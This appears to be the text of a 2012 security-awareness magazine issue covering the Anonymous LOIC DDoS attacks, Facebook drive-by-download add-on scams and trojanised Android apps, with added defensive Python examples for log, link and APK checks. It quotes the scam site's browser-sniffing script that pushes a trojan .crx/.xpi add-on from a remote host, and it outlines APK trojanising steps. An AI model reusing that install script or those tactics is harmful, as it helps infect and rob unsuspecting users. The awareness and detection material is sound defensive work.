The DoJ said that police executed more than 20 search warrants in the United States and eight countries, seized approximately $50 million in assets and targeted sites where Megaupload has servers in Ashburn, Va., Washington, D.C., the Netherlands and Canada. In addition, the U.S. District Court in Alexandria, Va., ordered the seizure of 18 domain names associated with the alleged Mega conspiracy. According to the indictment, for over five years the conspiracy operated websites that unlawfully reproduced and distributed infringing copies of copyrighted works, including movies (often before their theatrical release), music, television programs, electronic books, and business and entertainment software on a massive scale. The conspirators’ content hosting site, Megaupload.com, is advertised as having more than one billion visits, more than 150 million registered users and 50 million daily visitors, and as accounting for four percent of the total traffic on the Internet.


The Protest of Anonymous:

These actions led to what Anonymous (the hacktivist crew) called “the single largest Internet attack in its history”. Barrett Brown, described as a spokesperson for the group Anonymous by the state-run news outlet RT, said the timing of the raid “couldn’t have come at a worse time in terms of the government’s standpoint” and said that the websites of the Justice Department, FBI, Universal Music Group, the Recording Industry Association of America (RIAA), the Motion Picture Association of America (MPAA), and Broadcast Music Inc. had been shut down. Some commentators and observers have asserted that the FBI shutdown of Megaupload proves that SOPA and PIPA are unnecessary. Although the actions of Anonymous received support, others have argued that the denial of service attack risked damaging the anti-SOPA case. The attack included a new, sophisticated method whereby internet users who clicked on links placed in chat rooms and on Twitter participated, some without their knowledge, in a denial of service attack (DoS), thereby breaking existing US law. Anonymous used “Low Orbit Ion Cannon” (LOIC) to attack supporters of SOPA on January 19th, 2012. Anonymous claimed this to be their largest attack, with over 5,635 people participating in the DDoS attack via LOIC. LOIC was utilized by many attackers despite the fact that a network firewall can easily filter out the network traffic it generates, which renders it only partly effective. The group threatened to shut down Facebook’s 60,000 servers in Operation Global Blackout on January 28, 2012.



The LOIC Attack: This attack works similarly to a typical DoS/DDoS attack, as illustrated in the diagram below.

[Diagram: the LOIC attack flow]
(*) The attacker distributes the target IP to the internet using social networks, chat rooms, email, spam, etc.
(*) The links are shared by protesters and other innocent people who don’t know what they are sharing!
(*) The link reaches the maximum number of users. They click the link and launch a DoS/DDoS attack against the target.
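How a defender spots a flood of this shape in web-server logs, as an added example that is not code from the article: the script below parses combined-format access log lines (constructed here for illustration, not captured traffic), sorts them by time and reports every source address whose request count inside a sliding window reaches a threshold. The window and threshold values are assumptions to be tuned to a site’s normal traffic.

```python
"""Flag sources that behave like an HTTP flood in web-server access logs.

Added example, not code from the ImHaker article. It assumes Apache/nginx
"combined" log format; the log lines are constructed here, not captured.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "req": m.group("req"),
        "ua": m.group("ua") or "",
    }


def find_flooders(lines, window=timedelta(seconds=10), threshold=20):
    """Return {ip: peak requests inside any `window`} for sources at or above threshold.

    Window and threshold are assumptions; tune them to the site's normal traffic.
    """
    records = [r for r in map(parse_line, lines) if r is not None]
    records.sort(key=lambda r: r["ts"])      # log lines may be interleaved or out of order
    recent = defaultdict(deque)               # ip -> timestamps still inside the window
    peak = defaultdict(int)
    for r in records:
        q = recent[r["ip"]]
        q.append(r["ts"])
        while r["ts"] - q[0] > window:        # slide the window forward
            q.popleft()
        peak[r["ip"]] = max(peak[r["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


def _log_line(ts, ip, request, ua):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{request}" 200 512 "-" "{ua}"'


def constructed_sample():
    """Constructed log lines: one ordinary visitor and one flooding source."""
    base = datetime(2012, 1, 19, 21, 0, 0, tzinfo=timezone.utc)
    lines = [_log_line(base + timedelta(seconds=12 * i), "198.51.100.7",
                       "GET /index.html HTTP/1.1", "Mozilla/5.0") for i in range(5)]
    # 30 requests within six seconds from one address: the trace a LOIC HTTP flood leaves
    lines += [_log_line(base + timedelta(milliseconds=200 * i), "203.0.113.9",
                        "GET / HTTP/1.0", "-") for i in range(30)]
    return lines


if __name__ == "__main__":
    print(find_flooders(constructed_sample()))   # {'203.0.113.9': 30}
```

The article notes that a firewall can filter LOIC traffic; the per-source count above is the rule such a filter applies, and the addresses it returns are what an operator feeds into a block list or rate limiter. Because LOIC volunteers each hit from their own address, a distributed run shows up as many sources just under the threshold, so the same counter is usually also run per requested path.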



LOIC toolkit used to flood Twitter with a Java exploit!

After the shutdown of Megaupload, most of the other file sharing websites panicked and cleaned out suspected files shared and hosted on their servers without acknowledging the users. Another famous file sharing website, Filesonic, has recently blocked public sharing of files on the internet via URL links: users must be logged into their account to download hosted files, and only the user who uploaded a file can access it. Most of the other file sharing websites are under pressure too.



Protestors argue that the internet should be open for anyone to access global resources and to exercise the right to free speech. If SOPA comes into effect and a list of blocked websites has to be maintained by each internet service provider, then the operator will also have to monitor the internet traffic of each and every user. This not only raises privacy issues but also opens a door for hackers to gain access to sensitive user data. SOPA will, in essence, legitimize censorship and make it ‘acceptable’ or ‘the right thing to do’. The US government will reserve the right to brand any website as illegal and cut off all support to it. This will hurt entrepreneurial online ventures, hurt jobs, and several of your favorite websites may be gone forever too. Plus, there will always be ways to get around censorship and those in the know will manage; only the regular users of the internet will be affected.

Lawmakers from the leftist Palikot’s Movement cover their faces with masks as they protest against ACTA during a parliament session:



On January 26, 2012 Poland signed an international copyright agreement, sparking more demonstrations by Internet users who have protested for days over fear it will lead to online censorship. After the signing, protesters rallied in the Polish cities of Poznan and Lublin to express their anger over the treaty. Lawmakers for the leftwing Palikot’s Movement wore masks in parliament to show their dissatisfaction, while the largest opposition party — the right-wing Law and Justice party — called for a referendum on the matter.

Hackers Launching Satellite to Evade Internet Censorship:

During the Chaos Communication Congress in Berlin back in August -- an annual hacker conference sponsored by the German Chaos Computer Club -- a team of German hackers revealed plans to launch their own communication satellites into space in order to create a separate, “uncensorable” network called the Hackerspace Global Grid (HGG). “The first goal is an uncensorable Internet in space. Let’s take the Internet out of the control of terrestrial entities,” said activist Nick Farr. According to the report, the team will start by launching three prototype ground stations in the first half of 2012, and then launch at least one satellite into low orbit to communicate specifically with those stations. “It’s kind of a reverse GPS,” explained Armin Bauer, an HGG participant. “GPS uses satellites to calculate where we are, and this tells us where the satellites are. We would use GPS coordinates but also improve on them by using fixed sites in precisely-known locations.”


However, all these happenings remind us that technology has evolved and that even governments cannot control it. Built by people, it can only be controlled by people!


REAL TIME

FACEBOOK MALWARES EXPLAINED Drive-By-Download attacks

Technology and living have evolved. Worldwide, most people now live two lives: the real world and the virtual world. Social networking websites such as Facebook and Twitter are gaining ultimate popularity all over the world and their user numbers are constantly increasing, which drives cyber criminals to create dirty tricks and hacks to lure users into their hole. Last month’s issue detailed Facebook scams and malware and explained the importance of safety on social networking websites. Now we have an interesting malware to discuss that spreads through Facebook posts and comments. This malware has a well-programmed and well-designed fake website for phishing user details and getting Trojan files dropped onto your computer. Initially the cracker or malicious programmer develops a plug-in/add-on for the popular browsers such as Mozilla Firefox, Google Chrome and Microsoft Internet Explorer. Basic knowledge of web languages like PHP, JavaScript, XML and CSS is the only prerequisite for creating this kind of malicious plug-in/add-on. The cracker develops a Trojan dropper that can be added to any browser and injects the payload into your computer.



Here the cracker has two problems: “the user has to visit the malicious website” and “they must install the plug-in themselves”. So the cracker has to use some tricks to get the user to the malicious website and make them click the add-on link to install it; this kind of trick is formally known as a Drive-By Download, i.e. the users infect themselves with the malware. The screenshot below shows the Facebook page where a scam is posted on a user’s wall:

Whenever a user clicks on the link, they are redirected to a website like the one below, which amazingly looks just like the Facebook page. That makes the user feel that they are still on Facebook’s web page.



Most users will not notice that the domain/URL of the website has changed to something else and continue as if they were still surfing Facebook. In this situation, the viral script running behind the screen automatically detects the browser and redirects to different pages, as the attackers have different malware programmed for different browsers: for Firefox the add-on is in *.xpi format and for Chrome in *.crx format. The cracker programs these different types of malicious add-ons to extend the user infection rate.

    // Browser detection by matching the user-agent string
    var is_chrome = navigator.userAgent.toLowerCase().indexOf("chrome") > -1;
    var is_firefox = navigator.userAgent.toLowerCase().indexOf("firefox") > -1;

    function instalar() {
        if (is_chrome) {
            // Chrome: open the packaged extension (.crx) so the browser offers to install it
            window.open("http://[removed].com/Divx.crx");
        } else if (is_firefox) {
            // Firefox: hand the .xpi to the legacy InstallTrigger API, which prompts the user
            var params = {
                "Youtube Extension": {
                    URL: "http://[removed].com/Divx.xpi",
                    toString: function () { return this.URL; }
                }
            };
            InstallTrigger.install(params);
        } else {
            // Any other browser: open a different page (described below as /watch.php)
            window.open("");
        }
    }

Simple script used to detect the browser and execute the appropriate action for each.

At first the script checks whether the browser is Chrome. If so, it tries to install the plugin “Divx.crx”. If not, it checks whether the browser is Firefox; if so, it installs “Divx.xpi”. If both conditions fail, i.e. the browser may be Internet Explorer or anything else, it redirects the page to “/watch.php”, which contains porn or survey links to make a profit out of the user.



(We continued on the website in Firefox.) The malicious website has a video-player-like CSS block (fake) and shows an error message that “the required plug-in to play this video was not found” or has crashed (actually no such plug-in exists!) and that you have to install a plug-in from their website. If the user clicks on the install plug-in link, it automatically installs a Trojan dropper into the browser that may download and install the payload from a remote server. The payload installs malicious programs or affiliated adware on the victim’s computer that may be used to steal user data and cookies and to show ads.

After the user clicks on the “install Plugin” link, Firefox asks the user for permission.

The malicious add-on is installed from the remote server.



The same website opened in Internet Explorer leads to this page.

After continuing, the website shows a survey to take.

After clicking the survey link, it redirects the user to other malicious or porn websites.



The website waits until the user completes the survey in the linked page.

To prevent this kind of attack, we have some tips for you:
(*) Do not click on suspected URLs/links posted on your wall or in comments.
(*) Do not click a shortened URL directly. Extract the real URL using an expansion service and then visit it.
(*) Do not fall for click-jacking by porn videos or other videos that make you eager to click on the link.
(*) Have a good, updated anti-malware / security program installed on your computer.
(*) Install Firefox safety add-ons such as WOT and NoScript.
(*) Since most Facebook attacks happen only because of the user’s insufficient knowledge, subscribe to regular updates from security research labs and internet security websites to keep your knowledge current.
Have a safe and happy social networking, friends.
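The point made above, that users miss the changed domain, and the first two tips can be turned into a small link check. The code below is an added example and not from the article: it extracts the host a browser would really connect to, then flags look-alike domains, a hidden userinfo part and direct add-on package downloads. The trusted domains and the sample links are assumptions, and the registrable-domain rule is a deliberately simple two-label approximation.

```python
"""Check whether a link really leads to the site it appears to come from.

Added example, not code from the ImHaker article. The trusted domains and the
sample links are assumptions chosen for illustration; the registrable-domain
rule is a deliberately simple "last two labels" approximation.
"""
from urllib.parse import urlsplit

TRUSTED = {"facebook.com", "fbcdn.net"}    # assumption: domains the user expects to land on
ADDON_EXT = (".crx", ".xpi")               # Chrome / Firefox add-on packages, as in the article


def registrable_domain(host):
    """Approximate eTLD+1 as the last two labels (fine for .com-style names, wrong for co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def looks_like(host, trusted):
    """True if the trusted name appears inside the host once dots and hyphens are removed."""
    flat = host.lower().replace(".", "").replace("-", "")
    return trusted.replace(".", "") in flat


def check_link(url):
    """Return (verdict, reason); verdict is 'ok', 'suspicious' or 'invalid'."""
    parts = urlsplit(url)
    host = parts.hostname                     # the host the browser would really connect to
    if parts.scheme not in ("http", "https") or not host:
        return ("invalid", "not an http(s) URL with a host")
    if parts.username is not None:            # http://facebook.com@other.host/ trick
        return ("suspicious", f"userinfo '{parts.username}' hides the real host {host}")
    if parts.path.lower().endswith(ADDON_EXT):
        return ("suspicious", f"link downloads a browser add-on package from {host}")
    domain = registrable_domain(host)
    if domain in TRUSTED:
        return ("ok", f"{host} belongs to {domain}")
    for t in TRUSTED:
        if looks_like(host, t):
            return ("suspicious", f"{host} imitates {t} but is really under {domain}")
    return ("suspicious", f"{host} is not one of the expected sites ({domain})")


# Constructed sample links (the "example" names are reserved documentation domains).
CONSTRUCTED_LINKS = [
    "https://www.facebook.com/home.php",
    "http://facebook.com.example.net/watch.php",
    "http://facebook.com@203.0.113.5/watch.php",
    "https://video-plugin.example.com/Divx.crx",
    "javascript:alert(1)",
]

if __name__ == "__main__":
    for link in CONSTRUCTED_LINKS:
        print(link, "->", check_link(link))
```

The check deliberately stops at classifying: a shortened link still has to be expanded first (a network step left out here), and a registrable-domain list such as the Public Suffix List replaces the two-label rule in a production version.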





ANDROID malwares

FAKE APPS ON GOOGLE’S ANDROID MARKET

The era of mobile devices shrinks the world to something tiny and compact in our hands. The rapidly increasing number of users of mobile devices such as phones and tablets makes hackers open their store on the mobile platform. Google’s Android platform is now the most popular target for malicious mobile programs, overtaking other platforms as well as ‘generic’ Java malware. The share of Android-based malicious programs among all mobile malware is more than 46%, and growing rapidly, according to security firm Kaspersky Lab. It is no surprise that whenever a platform’s population increases, risks and problems arise. Google’s Android holds a 47% share of the entire mobile platform. According to Google, approximately 700,000 Android devices are activated daily.



To reduce the risk of malicious program installations, Google recommends its users download apps and games only from the Android Market, which is the official shop for both paid and free applications. But the frequent occurrences of fake apps being uploaded to the Android Market, and later removed by Google, leave a nasty feeling for users who trust the Android Market blindly. The screenshot below illustrates fake apps that closely resemble famous genuine Android apps. Want to know the difference? Look closer at the price and developer of the apps!

Fake apps listed on the Android Market by Miriada Production

Confused? The original “Angry Birds” app was developed by “Rovio Mobile”. But the apps in the screenshot above are not genuine; they are fake apps uploaded by a malicious uploader named “Miriada Production”. Google has since deleted this user’s account and uploads. But a lot of users were affected by this malware.



Users who have installed this fake app become victims of this malware. The user’s data, the account associated with the Android Market and the Google account (which includes Gmail, BlogSpot, Google+, etc.) can be stolen, and the money on your mobile balance can also be stolen by sending hidden SMS messages to premium-rate numbers.

How do they do that? First, the malicious user develops a malware program independently or buys one from other crackers. In most cases they download the original apps from the official market and then decompile them to get the app’s source code. Android apps have the *.apk file extension. There are several programs that can convert *.apk files into readable code.

Extracted files from a *.APK file:
(*) AndroidManifest.xml => Contains the information about the app and the developer of the app.
(*) res folder => Contains the graphical elements such as icons, pictures, etc.
(*) classes.dex => Important file that contains the code of the app, but in a compiled, unreadable format; you cannot read or modify it as a plain text file.



After getting the source code of the original app, the cracker adds his own code into the legitimate code.

Connecting to a remote server for malicious file

Checking permissions and getting root

Getting root using various exploits based on version




Drop file if not installed

Additional Trojan functionality (image source: isolated thread)



Then the cracker creates an Android Developer account in the official market using fake information.

Now he gets a personal developer certificate, which can be used to sign his fake app and then upload it to the market. After uploading, he adds the same information as the original app in the market and sells the app for less than the original (or even gives it away FREE of cost). So most users download the fake app instead of buying the original one and infect themselves with the malware. Until users complain about the malicious app or Google finds that the app is rogue, the fake app reaches a large number of innocent users and causes damage to them.

How to prevent?
(*) Always check the name and developer of the app, and look carefully for misspelled words before downloading (e.g. Angry Birds is not Angre Birds).
(*) While installing an application on the device, verify the access permissions carefully and avoid apps that ask for any suspicious permissions (e.g. a calculator application doesn’t require the SMS sending/receiving permission).
(*) Read the user reviews of that specific application before downloading.
(*) Use a good, updated security or anti-malware program on your device (it can affect your device’s performance and battery life).
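To see what the APK layout listed earlier and the permission advice above look like in practice, here is an added example that is not code from the article. It builds a small APK-like ZIP in memory with a decoded AndroidManifest.xml (a real APK stores the manifest as binary XML that a decoder turns into this text form), lists the entries, and reports permissions that a given kind of app has no business requesting. The per-app-type permission sets, the package name and the archive contents are constructed assumptions.

```python
"""Inspect an APK's contents and its requested permissions before trusting it.

Added example, not code from the ImHaker article. An APK is a ZIP archive; the
one below is constructed in memory, and its AndroidManifest.xml is the decoded
text form (in a real APK the manifest is binary XML that tools decode first).
The permission expectations per app type are assumptions.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumption: permissions a given kind of app legitimately needs.
EXPECTED = {
    "game": {"android.permission.INTERNET", "android.permission.VIBRATE"},
    "calculator": set(),
}
# Permissions the article singles out as typical of premium-SMS trojans.
HIGH_RISK = {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS"}


def list_entries(apk_bytes):
    """Names of the files inside the archive (manifest, classes.dex, res/, META-INF/ ...)."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return sorted(z.namelist())


def read_manifest(apk_bytes):
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return z.read("AndroidManifest.xml").decode()


def requested_permissions(manifest_xml):
    """Set of android:name values from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {e.get(f"{{{ANDROID_NS}}}name") for e in root.iter("uses-permission")}


def audit(apk_bytes, app_kind):
    """Return the package name plus unexpected and high-risk permissions for this app kind."""
    manifest = read_manifest(apk_bytes)
    perms = requested_permissions(manifest)
    unexpected = perms - EXPECTED.get(app_kind, set())
    return {
        "package": ET.fromstring(manifest).get("package"),
        "has_dex": "classes.dex" in list_entries(apk_bytes),
        "unexpected": sorted(unexpected),
        "high_risk": sorted(perms & HIGH_RISK),
    }


def constructed_apk():
    """A constructed, fake 'game' APK that asks for SMS and contacts access."""
    manifest = f'''<manifest xmlns:android="{ANDROID_NS}" package="com.example.angrybirds.fake">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Angre Birds"/>
</manifest>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", manifest)
        z.writestr("classes.dex", b"dex\n035\0")        # placeholder bytes, not real bytecode
        z.writestr("res/drawable/icon.png", b"")
        z.writestr("META-INF/CERT.RSA", b"")            # signer certificate would live here
    return buf.getvalue()


if __name__ == "__main__":
    apk = constructed_apk()
    print(list_entries(apk))
    print(audit(apk, "game"))
```

The audit answers the question the tip asks (“does this app need SMS?”) mechanically, which is what a market reviewer or an on-device scanner does at scale; comparing the signer certificate in META-INF against the known developer’s certificate is the matching check for the “same name, different developer” case, and needs a certificate parser not shown here.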


TECHNO

Shortage of Disk Drives to Continue Through 2012

HDD factories surrounded by the floods

Seagate Technology said that supply of hard disk drives (HDDs) this year will continue to fall short of demand, leading large customers to look to long-term agreements to ensure supply after devastating floods in Thailand. Shortage of drives by the end of this year is likely to be about 150 million units. The company plans to auction about 200,000 drives later this week to gauge demand, and provide customers an additional channel to buy the drives. Seagate plans to conduct such auctions periodically, said Steve Luczo, Seagate’s CEO. Western Digital, which had its factories surrounded in the floods, said that it expects its HDD production capacity to reach pre-flood levels only by the third quarter of this year.



GOOGLE TV DEVICES UPDATED ! SONY HAS UPDATES FOR THEIR DEVICES

The official Google TV team let us all know that Sony has an update in the works for their Google TV devices. The update will bring a Chrome browser that “works faster” and enable 3D for Blu-ray discs. Expect the update for your devices this week. A better browser is something everyone loves, but there is no word on whether any updates are coming for the Logitech Revue, which has been discontinued. Tweeted by @GoogleTV



GEEK JOKES !

NEWTON Vs STEVE JOBS

RECYCLE OLD COMPUTERS



HOW TO BE A GENIUS

WEB EFFECT




FROM IMHAKER TEAM

Thank you so much, friends, for all your feedback and suggestions. As we promised, we have increased the number of pages. We hope you delight in this month’s issue. We are also planning to publish the magazine in *.EPUB and *.MOBI formats in future. The ImHaker team is working very hard to improve each and every issue; we really need your support to fulfil your needs. So please give us feedback or suggestions to improve the magazine in any form.

WRITE FOR IMHAKER! Do you think you can write articles for ImHaker? Don’t hesitate! Act now. Send us your article before the 25th of the month and it will be published in the next issue. Just follow the simple rules given below:
(*) The article must be “genuine” and limited to 2 to 4 pages.
(*) Do not write articles on illegal/cracking/keygen/patch titles.
(*) The articles are not limited to any specific topic.
(*) Only one article per author will be published.
(*) Please send your articles in MS Word *.doc or *.docx format (include images, if any) to “submit@imhaker.com” and also include your profile information with a photograph to be published along with your article.

Want to advertise on ImHaker? Send your queries to “ads@imhaker.com”

Disclaimer: All information shared in this magazine is strictly for educational purposes and to improve the security defence attitude needed to prevent hacker attacks. Do not abuse any information provided by ImHaker magazine. If you cause any damage to your own or anyone else’s property, directly or indirectly, using the information provided, ImHaker Magazine and the authors are not responsible for that. Hacking is a crime if it is carried out illegally. Secure yourself and help others.


ImHaker Magazine February 2012  

ImHaker: Cyber Security Magazine for common people. To raise awareness among people about hackers and security issues. Grab your FREE copy at...

Advertisement